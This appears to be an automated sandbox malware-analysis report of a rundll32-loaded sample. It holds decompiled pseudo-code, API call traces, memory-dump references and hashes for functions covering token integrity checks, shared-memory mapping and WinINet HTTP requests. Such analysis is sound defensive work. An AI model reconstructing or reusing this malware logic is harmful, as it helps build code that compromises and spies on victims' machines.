
                    APIs
                    • GetSystemTimeAsFileTime.KERNEL32(?,?,00000000,?,?,?,?,?,?,042165C3,?,?,4D283A53,?,?), ref: 04214156
                    • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 0421416C
                    • _snwprintf.NTDLL ref: 04214191
                    • CreateFileMappingW.KERNELBASE(000000FF,0421A34C,00000004,00000000,00001000,?,?,?,?,?,00000000), ref: 042141AD
                    • GetLastError.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,042165C3,?,?,4D283A53,?), ref: 042141BF
                    • MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000,?,?,?,?,00000000), ref: 042141D6
                    • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,?,?,?,?,?,042165C3,?,?,4D283A53), ref: 042141F7
                    • GetLastError.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,042165C3,?,?,4D283A53,?), ref: 042141FF
                    Memory Dump Source
                    • Source File: 00000006.00000002.811456478.0000000004211000.00000020.00020000.sdmp, Offset: 04210000, based on PE: true
                    • Associated: 00000006.00000002.811440190.0000000004210000.00000004.00020000.sdmp
                    • Associated: 00000006.00000002.811472949.0000000004219000.00000002.00020000.sdmp
                    • Associated: 00000006.00000002.811484936.000000000421A000.00000004.00020000.sdmp
                    • Associated: 00000006.00000002.811499542.000000000421C000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_4210000_rundll32.jbxd
                    Similarity
                    • API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                    • String ID:
                    • API String ID: 1814172918-0
                    • Opcode ID: db137f92992da9a36f80b1a3309cd0be9c209e76741c8c3db864ee487bd5274c
                    • Instruction ID: 265996a1203513a4a028c6b84838c6b6ffbfd15e78a47dcd33149af27ae166e3
                    • Opcode Fuzzy Hash: db137f92992da9a36f80b1a3309cd0be9c209e76741c8c3db864ee487bd5274c
                    • Instruction Fuzzy Hash: CA21A5B2710214BBD711AF68DC49F9A77F9EBA4750F250121F609E71A0DF70AA45CB50
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    C-Code - Quality: 93%
                    			E04215622(intOrPtr* __eax, void* __ebx, void* __ecx, void* __edi) {
                    				void* _t17;
                    				void* _t18;
                    				void* _t19;
                    				void* _t20;
                    				void* _t21;
                    				intOrPtr _t24;
                    				void* _t37;
                    				void* _t41;
                    				intOrPtr* _t45;
                    
                    				_t41 = __edi;
                    				_t37 = __ebx;
                    				_t45 = __eax;
                    				_t16 =  *((intOrPtr*)(__eax + 0x20));
                    				if( *((intOrPtr*)(__eax + 0x20)) != 0) {
                    					E04215867(_t16, __ecx, 0xea60);
                    				}
                    				_t17 =  *(_t45 + 0x18);
                    				_push(_t37);
                    				_push(_t41);
                    				if(_t17 != 0) {
                    					InternetSetStatusCallback(_t17, 0);
                    					InternetCloseHandle( *(_t45 + 0x18)); // executed
                    				}
                    				_t18 =  *(_t45 + 0x14);
                    				if(_t18 != 0) {
                    					InternetSetStatusCallback(_t18, 0);
                    					InternetCloseHandle( *(_t45 + 0x14));
                    				}
                    				_t19 =  *(_t45 + 0x10);
                    				if(_t19 != 0) {
                    					InternetSetStatusCallback(_t19, 0);
                    					InternetCloseHandle( *(_t45 + 0x10));
                    				}
                    				_t20 =  *(_t45 + 0x1c);
                    				if(_t20 != 0) {
                    					CloseHandle(_t20);
                    				}
                    				_t21 =  *(_t45 + 0x20);
                    				if(_t21 != 0) {
                    					CloseHandle(_t21);
                    				}
                    				_t22 =  *((intOrPtr*)(_t45 + 8));
                    				if( *((intOrPtr*)(_t45 + 8)) != 0) {
                    					E042117AB(_t22);
                    					 *((intOrPtr*)(_t45 + 8)) = 0;
                    					 *((intOrPtr*)(_t45 + 0x30)) = 0;
                    				}
                    				_t23 =  *((intOrPtr*)(_t45 + 0xc));
                    				if( *((intOrPtr*)(_t45 + 0xc)) != 0) {
                    					E042117AB(_t23);
                    				}
                    				_t24 =  *_t45;
                    				if(_t24 != 0) {
                    					_t24 = E042117AB(_t24);
                    				}
                    				_t46 =  *((intOrPtr*)(_t45 + 4));
                    				if( *((intOrPtr*)(_t45 + 4)) != 0) {
                    					return E042117AB(_t46);
                    				}
                    				return _t24;
                    			}

                    APIs
                    • InternetSetStatusCallback.WININET(?,00000000), ref: 04215650
                    • InternetCloseHandle.WININET(?), ref: 04215655
                    • InternetSetStatusCallback.WININET(?,00000000), ref: 04215660
                    • InternetCloseHandle.WININET(?), ref: 04215665
                    • InternetSetStatusCallback.WININET(?,00000000), ref: 04215670
                    • InternetCloseHandle.WININET(?), ref: 04215675
                    • CloseHandle.KERNEL32(?,00000000,00000102,?,?,04211B44,?,?,00000000,00000000,74E481D0), ref: 04215685
                    • CloseHandle.KERNEL32(?,00000000,00000102,?,?,04211B44,?,?,00000000,00000000,74E481D0), ref: 0421568F
                      • Part of subcall function 04215867: WaitForMultipleObjects.KERNEL32(00000002,04217AF8,00000000,04217AF8,?,?,?,04217AF8,0000EA60), ref: 04215882
                    Memory Dump Source
                    • Source File: 00000006.00000002.811456478.0000000004211000.00000020.00020000.sdmp, Offset: 04210000, based on PE: true
                    • Associated: 00000006.00000002.811440190.0000000004210000.00000004.00020000.sdmp
                    • Associated: 00000006.00000002.811472949.0000000004219000.00000002.00020000.sdmp
                    • Associated: 00000006.00000002.811484936.000000000421A000.00000004.00020000.sdmp
                    • Associated: 00000006.00000002.811499542.000000000421C000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_4210000_rundll32.jbxd
                    Similarity
                    • API ID: Internet$CloseHandle$CallbackStatus$MultipleObjectsWait
                    • String ID:
                    • API String ID: 2824497044-0
                    • Opcode ID: 2210e28aeb01d0da6667b19c3fc991b019a009c51e0f606940b36d6f5abe4e1d
                    • Instruction ID: d56ed2a1c8595c8525bac34e12203a509c76ed07b57b83658887430aeeb9ec9f
                    • Opcode Fuzzy Hash: 2210e28aeb01d0da6667b19c3fc991b019a009c51e0f606940b36d6f5abe4e1d
                    • Instruction Fuzzy Hash: A1116D717207896BC630AEAAEC84C2BB7F9ABA43443590D58E186D3560C735F8858AA4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    C-Code - Quality: 100%
                    			E042113CF(long* _a4) {
                    				long _v8;
                    				void* _v12;
                    				void _v16;
                    				long _v20;
                    				int _t33;
                    				void* _t46;
                    
                    				_v16 = 1;
                    				_v20 = 0x2000;
                    				if( *0x421a2fc > 5) {
                    					_v16 = 0;
                    					if(OpenProcessToken(0xffffffff, 0x20008,  &_v12) != 0) {
                    						GetTokenInformation(_v12, 0x14,  &_v16, 4,  &_v8); // executed
                    						_v8 = 0;
                    						GetTokenInformation(_v12, 0x19, 0, 0,  &_v8); // executed
                    						if(_v8 != 0) {
                    							_t46 = E042163FD(_v8);
                    							if(_t46 != 0) {
                    								_t33 = GetTokenInformation(_v12, 0x19, _t46, _v8,  &_v8); // executed
                    								if(_t33 != 0) {
                    									_v20 =  *(GetSidSubAuthority( *_t46,  *(GetSidSubAuthorityCount( *_t46)) - 0x00000001 & 0x000000ff));
                    								}
                    								E042117AB(_t46);
                    							}
                    						}
                    						CloseHandle(_v12);
                    					}
                    				}
                    				 *_a4 = _v20;
                    				return _v16;
                    			}










                    APIs
                    • OpenProcessToken.ADVAPI32(000000FF,00020008,00000000,00000000), ref: 04211401
                    • GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),00000001,00000004,?,00000000), ref: 04211421
                    • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 04211431
                    • CloseHandle.KERNEL32(00000000), ref: 04211481
                      • Part of subcall function 042163FD: RtlAllocateHeap.NTDLL(00000000,00000000,042128D5), ref: 04216409
                    • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,?,?,?,?), ref: 04211454
                    • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 0421145C
                    • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 0421146C
                    Memory Dump Source
                    • Source File: 00000006.00000002.811456478.0000000004211000.00000020.00020000.sdmp, Offset: 04210000, based on PE: true
                    • Associated: 00000006.00000002.811440190.0000000004210000.00000004.00020000.sdmp
                    • Associated: 00000006.00000002.811472949.0000000004219000.00000002.00020000.sdmp
                    • Associated: 00000006.00000002.811484936.000000000421A000.00000004.00020000.sdmp
                    • Associated: 00000006.00000002.811499542.000000000421C000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_4210000_rundll32.jbxd
                    Similarity
                    • API ID: Token$Information$Authority$AllocateCloseCountHandleHeapOpenProcess
                    • String ID:
                    • API String ID: 1295030180-0
                    • Opcode ID: cd4e3e19a5ce8b6859f9624bf3c6016326b754101e23ca253da8ddf003c4ef3a
                    • Instruction ID: 1d7c2437730adae20ea1134b77aebc9c59bff012f90e15c9577d6e3fd853ffd9
                    • Opcode Fuzzy Hash: cd4e3e19a5ce8b6859f9624bf3c6016326b754101e23ca253da8ddf003c4ef3a
                    • Instruction Fuzzy Hash: 44215C75A00209FFEB109FA4DC48EFEBBB9EF58704F0040A5E610A6260DB755E50DB60
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    C-Code - Quality: 64%
                    			E042118BA(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                    				intOrPtr _v8;
                    				intOrPtr _t9;
                    				intOrPtr _t13;
                    				char* _t19;
                    				char* _t28;
                    				void* _t33;
                    				void* _t34;
                    				char* _t36;
                    				void* _t38;
                    				intOrPtr* _t39;
                    				char* _t40;
                    				char* _t42;
                    				char* _t43;
                    
                    				_t34 = __edx;
                    				_push(__ecx);
                    				_t9 =  *0x421a320; // 0x87d5a8
                    				_t1 = _t9 + 0x421b62c; // 0x253d7325
                    				_t36 = 0;
                    				_t28 = E042161A7(__ecx, _t1);
                    				if(_t28 != 0) {
                    					_t39 = __imp__;
                    					_t13 =  *_t39(_t28, _t38);
                    					_v8 = _t13;
                    					_t40 = E042163FD(_v8 +  *_t39(_a4) + 1);
                    					if(_t40 != 0) {
                    						strcpy(_t40, _t28);
                    						_pop(_t33);
                    						__imp__(_t40, _a4);
                    						_t19 = E04217885(_t33, _t34, _t40, _a8); // executed
                    						_t36 = _t19;
                    						E042117AB(_t40);
                    						_t42 = E04216863(StrTrimA(_t36, "="), _t36);
                    						if(_t42 != 0) {
                    							E042117AB(_t36);
                    							_t36 = _t42;
                    						}
                    						_t43 = E04215ACD(_t36, _t33);
                    						if(_t43 != 0) {
                    							E042117AB(_t36);
                    							_t36 = _t43;
                    						}
                    					}
                    					E042117AB(_t28);
                    				}
                    				return _t36;
                    			}

















                    APIs
                      • Part of subcall function 042161A7: lstrlen.KERNEL32(00000000,00000000,00000000,7691C740,?,?,?,042118D3,253D7325,00000000,7691C740,?,?,04216ABB,?,04A995B0), ref: 0421620E
                      • Part of subcall function 042161A7: sprintf.NTDLL ref: 0421622F
                    • lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,7691C740,?,?,04216ABB,?,04A995B0), ref: 042118E5
                    • lstrlen.KERNEL32(?,?,?,04216ABB,?,04A995B0), ref: 042118ED
                      • Part of subcall function 042163FD: RtlAllocateHeap.NTDLL(00000000,00000000,042128D5), ref: 04216409
                    • strcpy.NTDLL ref: 04211904
                    • lstrcat.KERNEL32(00000000,?), ref: 0421190F
                      • Part of subcall function 04217885: lstrlen.KERNEL32(?,?,?,00000000,?,0421191E,00000000,?,?,?,04216ABB,?,04A995B0), ref: 04217896
                      • Part of subcall function 042117AB: HeapFree.KERNEL32(00000000,00000000,04212976,00000000,?,?,00000000), ref: 042117B7
                    • StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,04216ABB,?,04A995B0), ref: 0421192C
                      • Part of subcall function 04216863: lstrlen.KERNEL32(?,00000000,00000000,00000000,?,04211938,00000000,?,?,04216ABB,?,04A995B0), ref: 0421686D
                      • Part of subcall function 04216863: _snprintf.NTDLL ref: 042168CB
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.811456478.0000000004211000.00000020.00020000.sdmp, Offset: 04210000, based on PE: true
                    • Associated: 00000006.00000002.811440190.0000000004210000.00000004.00020000.sdmp
                    • Associated: 00000006.00000002.811472949.0000000004219000.00000002.00020000.sdmp
                    • Associated: 00000006.00000002.811484936.000000000421A000.00000004.00020000.sdmp
                    • Associated: 00000006.00000002.811499542.000000000421C000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_4210000_rundll32.jbxd
                    Similarity
                    • API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
                    • String ID: =
                    • API String ID: 2864389247-1428090586
                    • Opcode ID: 35114498bfbb01c698c28f4c7776a9222cb6bb15f2330ebae0c209a2bdd08f79
                    • Instruction ID: 153be2904bd9fe723a7bf32eae85a45d5156fcdb293f71b6ad92708cae2b9ff4
                    • Opcode Fuzzy Hash: 35114498bfbb01c698c28f4c7776a9222cb6bb15f2330ebae0c209a2bdd08f79
                    • Instruction Fuzzy Hash: C211CA77B211257797127778AC84C7E36FD9FB9A543090465F601A7220DF74ED0287E1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 341 4211e51-4211e9d SysAllocString 342 4211fc1-4211fc4 341->342 343 4211ea3-4211ecf 341->343 344 4211fc6-4211fc9 SafeArrayDestroy 342->344 345 4211fcf-4211fd2 342->345 349 4211ed5-4211ee1 call 42156cf 343->349 350 4211fbe 343->350 344->345 347 4211fd4-4211fd7 SysFreeString 345->347 348 4211fdd-4211fe4 345->348 347->348 349->350 353 4211ee7-4211ef7 349->353 350->342 353->350 355 4211efd-4211f23 IUnknown_QueryInterface_Proxy 353->355 355->350 357 4211f29-4211f3d 355->357 359 4211f7b-4211f7e 357->359 360 4211f3f-4211f42 357->360 362 4211f80-4211f85 359->362 363 4211fb5-4211fba 359->363 360->359 361 4211f44-4211f5b StrStrIW 360->361 364 4211f72-4211f75 SysFreeString 361->364 365 4211f5d-4211f66 call 4213d67 361->365 362->363 366 4211f87-4211f92 call 42157a8 362->366 363->350 364->359 365->364 371 4211f68-4211f70 call 42156cf 365->371 370 4211f97-4211f9b 366->370 370->363 372 4211f9d-4211fa2 370->372 371->364 374 4211fb0 372->374 375 4211fa4-4211fae 372->375 374->363 375->363
                    APIs
                    • SysAllocString.OLEAUT32(?), ref: 04211E92
                    • IUnknown_QueryInterface_Proxy.RPCRT4(00000008,332C4425,?), ref: 04211F14
                    • StrStrIW.SHLWAPI(?,006E0069), ref: 04211F53
                    • SysFreeString.OLEAUT32(?), ref: 04211F75
                      • Part of subcall function 04213D67: SysAllocString.OLEAUT32(04219290), ref: 04213DB7
                    • SafeArrayDestroy.OLEAUT32(?), ref: 04211FC9
                    • SysFreeString.OLEAUT32(?), ref: 04211FD7
                      • Part of subcall function 042156CF: Sleep.KERNEL32(000001F4), ref: 04215717
                    Memory Dump Source
                    • Source File: 00000006.00000002.811456478.0000000004211000.00000020.00020000.sdmp, Offset: 04210000, based on PE: true
                    • Associated: 00000006.00000002.811440190.0000000004210000.00000004.00020000.sdmp
                    • Associated: 00000006.00000002.811472949.0000000004219000.00000002.00020000.sdmp
                    • Associated: 00000006.00000002.811484936.000000000421A000.00000004.00020000.sdmp
                    • Associated: 00000006.00000002.811499542.000000000421C000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_4210000_rundll32.jbxd
                    Similarity
                    • API ID: String$AllocFree$ArrayDestroyInterface_ProxyQuerySafeSleepUnknown_
                    • String ID:
                    • API String ID: 2118684380-0
                    • Opcode ID: fb092065dcffaf83682a428bad839051f6614b1aba707e9989efb6dd05bbc638
                    • Instruction ID: 3a451b0f04dfc470f79d740c7ee77002e4895aba897db6c86ab834298f553f26
                    • Opcode Fuzzy Hash: fb092065dcffaf83682a428bad839051f6614b1aba707e9989efb6dd05bbc638
                    • Instruction Fuzzy Hash: 7F515172A10209EFCB10DFA8C8848AEF7F6FF98340B148968F615DB220DB75AD55CB50
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 377 42143d8-42143e7 378 42143e9-42143f9 call 421395b 377->378 379 42143fb-42143ff call 4217a34 377->379 378->379 384 421444a GetLastError 378->384 383 4214404-4214406 379->383 385 4214445-4214448 383->385 386 4214408-421442d ResetEvent * 2 HttpSendRequestA 383->386 389 421444c-421444e 384->389 385->384 385->389 387 421443a-421443d SetEvent 386->387 388 421442f-4214436 GetLastError 386->388 391 4214443 387->391 388->385 390 4214438 388->390 390->391 391->385
                    C-Code - Quality: 100%
                    			E042143D8(void* __eax, intOrPtr _a4, intOrPtr _a8) {
                    				void* __esi;
                    				long _t10;
                    				void* _t18;
                    				void* _t22;
                    
                    				_t9 = __eax;
                    				_t22 = __eax;
                    				if(_a4 != 0 && E0421395B(__eax + 4, _t18, _a4, __eax, __eax + 4) == 0) {
                    					L9:
                    					return GetLastError();
                    				}
                    				_t10 = E04217A34(_t9, _t18, _t22, _a8); // executed
                    				if(_t10 == 0) {
                    					ResetEvent( *(_t22 + 0x1c));
                    					ResetEvent( *(_t22 + 0x20));
                    					if(HttpSendRequestA( *(_t22 + 0x18), 0, 0xffffffff, 0, 0) != 0) {
                    						SetEvent( *(_t22 + 0x1c));
                    						goto L7;
                    					} else {
                    						_t10 = GetLastError();
                    						if(_t10 == 0x3e5) {
                    							L7:
                    							_t10 = 0;
                    						}
                    					}
                    				}
                    				if(_t10 == 0xffffffff) {
                    					goto L9;
                    				}
                    				return _t10;
                    			}








                    APIs
                    • ResetEvent.KERNEL32(?,00000008,?,?,00000102,04211AE3,?,?,00000000,00000000), ref: 04214412
                    • ResetEvent.KERNEL32(?), ref: 04214417
                    • HttpSendRequestA.WININET(?,00000000,000000FF,00000000,00000000), ref: 04214424
                    • GetLastError.KERNEL32 ref: 0421442F
                    • GetLastError.KERNEL32(?,?,00000102,04211AE3,?,?,00000000,00000000), ref: 0421444A
                      • Part of subcall function 0421395B: lstrlen.KERNEL32(00000000,00000008,?,74E04D40,?,?,042143F7,?,?,?,?,00000102,04211AE3,?,?,00000000), ref: 04213967
                      • Part of subcall function 0421395B: memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,042143F7,?,?,?,?,00000102,04211AE3,?), ref: 042139C5
                      • Part of subcall function 0421395B: lstrcpy.KERNEL32(00000000,00000000), ref: 042139D5
                    • SetEvent.KERNEL32(?), ref: 0421443D
                    Memory Dump Source
                    • Source File: 00000006.00000002.811456478.0000000004211000.00000020.00020000.sdmp, Offset: 04210000, based on PE: true
                    • Associated: 00000006.00000002.811440190.0000000004210000.00000004.00020000.sdmp
                    • Associated: 00000006.00000002.811472949.0000000004219000.00000002.00020000.sdmp
                    • Associated: 00000006.00000002.811484936.000000000421A000.00000004.00020000.sdmp
                    • Associated: 00000006.00000002.811499542.000000000421C000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_4210000_rundll32.jbxd
                    Similarity
                    • API ID: Event$ErrorLastReset$HttpRequestSendlstrcpylstrlenmemcpy
                    • String ID:
                    • API String ID: 3739416942-0
                    • Opcode ID: 9eef42432477dff6245eae06b55a90fdf169cfe2560780d74eb95346461ea8f9
                    • Instruction ID: fd509f1228e95dd242d409a0a8f1f809a95913eba4bc8f78628290cd603a56bd
                    • Opcode Fuzzy Hash: 9eef42432477dff6245eae06b55a90fdf169cfe2560780d74eb95346461ea8f9
                    • Instruction Fuzzy Hash: 3601AD31324201AAEB307E25EC48F5BB6E8EFA4728F644625F599920F0DB20F944DA52
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 392 4213a12-4213a57 wsprintfA 393 4213a59-4213a61 RtlAllocateHeap 392->393 394 4213a7b-4213a83 RtlAllocateHeap 392->394 395 4213aa0 393->395 396 4213a63-4213a74 call 4212fc4 393->396 394->395 397 4213a85-4213a96 call 42168eb 394->397 400 4213aa7-4213aab 395->400 401 4213a79 396->401 402 4213a9b-4213a9e 397->402 403 4213ae5 400->403 404 4213aad-4213ac8 call 42152a9 call 4214dc8 400->404 401->402 402->400 406 4213aeb-4213af2 403->406 410 4213af5-4213b06 404->410 411 4213aca-4213ad9 call 4215f6a 404->411 410->406 413 4213b08-4213b0f 410->413 411->403 413->406
                    C-Code - Quality: 65%
                    			E04213A12(intOrPtr* __eax, void* __ecx, void* __edx, long _a4, void** _a8, intOrPtr* _a12, char _a16) {
                    				void* _v8;
                    				char _v48;
                    				void* __edi;
                    				intOrPtr _t22;
                    				intOrPtr _t30;
                    				intOrPtr _t37;
                    				void* _t38;
                    				intOrPtr* _t43;
                    				void* _t44;
                    				void* _t48;
                    				intOrPtr* _t49;
                    				void* _t50;
                    				intOrPtr _t51;
                    
                    				_t48 = __edx;
                    				_t44 = __ecx;
                    				_t43 = _a16;
                    				_t49 = __eax;
                    				_t22 =  *0x421a320; // 0x87d5a8
                    				_t2 = _t22 + 0x421b682; // 0x657a6973
                    				wsprintfA( &_v48, _t2,  *__eax,  *_t43);
                    				_t51 =  *0x421a3e0; // 0x4a99b60
                    				_push(0x800);
                    				_push(0);
                    				_push( *0x421a2d8);
                    				if( *0x421a2ec >= 5) {
                    					if(RtlAllocateHeap() == 0) {
                    						L6:
                    						_a4 = 8;
                    						L7:
                    						if(_a4 != 0) {
                    							L10:
                    							 *0x421a2ec =  *0x421a2ec + 1;
                    							L11:
                    							return _a4;
                    						}
                    						_t52 = _a16;
                    						 *_t49 = _a16;
                    						_t50 = _v8;
                    						 *_t43 = E042152A9(_t52, _t50); // executed
                    						_t30 = E04214DC8(_t50, _t52); // executed
                    						if(_t30 != 0) {
                    							 *_a8 = _t50;
                    							 *_a12 = _t30;
                    							if( *0x421a2ec < 5) {
                    								 *0x421a2ec =  *0x421a2ec & 0x00000000;
                    							}
                    							goto L11;
                    						}
                    						_a4 = 0xbf;
                    						E04215F6A();
                    						RtlFreeHeap( *0x421a2d8, 0, _t50); // executed
                    						goto L10;
                    					}
                    					_t37 = E042168EB(_a4, _t48, _t51,  &_v48,  &_v8,  &_a16, _t26);
                    					L5:
                    					_a4 = _t37;
                    					goto L7;
                    				}
                    				_t38 = RtlAllocateHeap(); // executed
                    				if(_t38 == 0) {
                    					goto L6;
                    				}
                    				_t37 = E04212FC4(_a4, _t44, _t48, _t51,  &_v48,  &_v8,  &_a16, _t38); // executed
                    				goto L5;
                    			}

















                    APIs
                    • wsprintfA.USER32 ref: 04213A34
                    • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 04213A59
                      • Part of subcall function 04212FC4: GetTickCount.KERNEL32 ref: 04212FD8
                      • Part of subcall function 04212FC4: wsprintfA.USER32 ref: 04213028
                      • Part of subcall function 04212FC4: wsprintfA.USER32 ref: 04213045
                      • Part of subcall function 04212FC4: wsprintfA.USER32 ref: 04213065
                      • Part of subcall function 04212FC4: wsprintfA.USER32 ref: 04213091
                      • Part of subcall function 04212FC4: HeapFree.KERNEL32(00000000,00000000), ref: 042130A3
                      • Part of subcall function 04212FC4: wsprintfA.USER32 ref: 042130C4
                      • Part of subcall function 04212FC4: HeapFree.KERNEL32(00000000,00000000), ref: 042130D4
                    • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 04213A7B
                    • RtlFreeHeap.NTDLL(00000000,?,?), ref: 04213ADF
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.811456478.0000000004211000.00000020.00020000.sdmp, Offset: 04210000, based on PE: true
                    • Associated: 00000006.00000002.811440190.0000000004210000.00000004.00020000.sdmp
                    • Associated: 00000006.00000002.811472949.0000000004219000.00000002.00020000.sdmp
                    • Associated: 00000006.00000002.811484936.000000000421A000.00000004.00020000.sdmp
                    • Associated: 00000006.00000002.811499542.000000000421C000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_4210000_rundll32.jbxd
                    Similarity
                    • API ID: wsprintf$Heap$Free$Allocate$CountTick
                    • String ID: Ut
                    • API String ID: 1428766365-8415677
                    • Opcode ID: 15a5832409fd27e5a3550a775ad51199e17e259ec0b9df063d1ecb5978f8a118
                    • Instruction ID: 2dbf83d9de604fcffbf07d548107db65205209cfdc7234f921ba7c8b5655f9f8
                    • Opcode Fuzzy Hash: 15a5832409fd27e5a3550a775ad51199e17e259ec0b9df063d1ecb5978f8a118
                    • Instruction Fuzzy Hash: 42315E76711109EBDB01DFA8E888EDA7BFDFB28354F108012F905E7260DB75A944CBA1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 50%
                    			E04211000(void** __esi) {
                    				intOrPtr _v0;
                    				intOrPtr _t4;
                    				intOrPtr _t6;
                    				void* _t8;
                    				void* _t9;
                    				intOrPtr _t10;
                    				void* _t11;
                    				void** _t13;
                    
                    				_t13 = __esi;
                    				_t4 =  *0x421a3cc; // 0x4a995b0
                    				__imp__(_t4 + 0x40);
                    				while(1) {
                    					_t6 =  *0x421a3cc; // 0x4a995b0
                    					_t1 = _t6 + 0x58; // 0x0
                    					if( *_t1 == 0) {
                    						break;
                    					}
                    					Sleep(0xa);
                    				}
                    				_t8 =  *_t13;
                    				if(_t8 != 0 && _t8 != 0x421a030) {
                    					HeapFree( *0x421a2d8, 0, _t8);
                    				}
                    				_t9 = E04213B61(_v0, _t13); // executed
                    				_t13[1] = _t9;
                    				_t10 =  *0x421a3cc; // 0x4a995b0
                    				_t11 = _t10 + 0x40;
                    				__imp__(_t11);
                    				return _t11;
                    			}












                    APIs
                    • RtlEnterCriticalSection.NTDLL(04A99570), ref: 04211009
                    • Sleep.KERNEL32(0000000A), ref: 04211013
                    • HeapFree.KERNEL32(00000000,00000000), ref: 0421103B
                    • RtlLeaveCriticalSection.NTDLL(04A99570), ref: 04211057
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.811456478.0000000004211000.00000020.00020000.sdmp, Offset: 04210000, based on PE: true
                    • Associated: 00000006.00000002.811440190.0000000004210000.00000004.00020000.sdmp
                    • Associated: 00000006.00000002.811472949.0000000004219000.00000002.00020000.sdmp
                    • Associated: 00000006.00000002.811484936.000000000421A000.00000004.00020000.sdmp
                    • Associated: 00000006.00000002.811499542.000000000421C000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_4210000_rundll32.jbxd
                    Similarity
                    • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                    • String ID: Ut
                    • API String ID: 58946197-8415677
                    • Opcode ID: 92cac9a9d4d8ae6efd7c7ddbde134c06a5e968cd69e5dbd82fcb44660876da2b
                    • Instruction ID: d3d91acb27cfab9f86eb7ca8465ee77016392034913fbc55798ede703ff76a85
                    • Opcode Fuzzy Hash: 92cac9a9d4d8ae6efd7c7ddbde134c06a5e968cd69e5dbd82fcb44660876da2b
                    • Instruction Fuzzy Hash: 40F0DAB0B112529BEB209B6DEC4DF267BE4EB34744B048415F905D6171DA38EC90DA24
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 57%
                    			E04216535(signed int __edx) {
                    				signed int _v8;
                    				long _v12;
                    				CHAR* _v16;
                    				long _v20;
                    				void* __ebx;
                    				void* __edi;
                    				void* __esi;
                    				void* _t21;
                    				CHAR* _t22;
                    				CHAR* _t25;
                    				intOrPtr _t26;
                    				void* _t27;
                    				void* _t31;
                    				void* _t32;
                    				CHAR* _t36;
                    				CHAR* _t42;
                    				CHAR* _t43;
                    				CHAR* _t44;
                    				void* _t49;
                    				void* _t51;
                    				signed char _t56;
                    				intOrPtr _t58;
                    				signed int _t59;
                    				void* _t63;
                    				CHAR* _t67;
                    				CHAR* _t68;
                    				char* _t69;
                    				void* _t70;
                    
                    				_t61 = __edx;
                    				_v20 = 0;
                    				_v8 = 0;
                    				_v12 = 0;
                    				_t21 = E04214843();
                    				if(_t21 != 0) {
                    					_t59 =  *0x421a2fc; // 0x4000000a
                    					_t55 = (_t59 & 0xf0000000) + _t21;
                    					 *0x421a2fc = (_t59 & 0xf0000000) + _t21;
                    				}
                    				_t22 =  *0x421a178(0, 2); // executed
                    				_v16 = _t22;
                    				if(_t22 == 0 || _t22 == 1 || _t22 == 0x80010106) {
                    					_t25 = E04211649( &_v8,  &_v20); // executed
                    					_t54 = _t25;
                    					_t26 =  *0x421a320; // 0x87d5a8
                    					if( *0x421a2fc > 5) {
                    						_t8 = _t26 + 0x421b5cd; // 0x4d283a53
                    						_t27 = _t8;
                    					} else {
                    						_t7 = _t26 + 0x421b9f5; // 0x44283a44
                    						_t27 = _t7;
                    					}
                    					E04215A2D(_t27, _t27);
                    					_t31 = E0421414A(_t61,  &_v20,  &_v12); // executed
                    					if(_t31 == 0) {
                    						CloseHandle(_v20);
                    					}
                    					_t63 = 5;
                    					if(_t54 != _t63) {
                    						 *0x421a310 =  *0x421a310 ^ 0x81bbe65d;
                    						_t32 = E042163FD(0x60);
                    						__eflags = _t32;
                    						 *0x421a3cc = _t32;
                    						if(_t32 == 0) {
                    							_push(8);
                    							_pop(0);
                    						} else {
                    							memset(_t32, 0, 0x60);
                    							_t49 =  *0x421a3cc; // 0x4a995b0
                    							_t70 = _t70 + 0xc;
                    							__imp__(_t49 + 0x40);
                    							_t51 =  *0x421a3cc; // 0x4a995b0
                    							 *_t51 = 0x421b81a;
                    						}
                    						__eflags = 0;
                    						_t54 = 0;
